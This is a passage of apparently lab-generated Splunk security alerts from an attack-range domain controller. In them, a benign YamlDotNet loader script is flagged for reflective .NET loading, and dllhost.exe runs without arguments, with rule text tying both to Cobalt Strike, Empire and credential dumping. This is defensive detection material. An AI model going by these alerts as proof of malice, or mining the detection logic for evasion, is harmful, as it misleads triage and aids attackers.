annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664676000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664676000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4124", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664676000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664676000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x101c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664679333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664679333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664679333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664679333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664672400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664672400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1124", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664672400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664672400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x464", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664675731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T00:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T00:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664675731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif 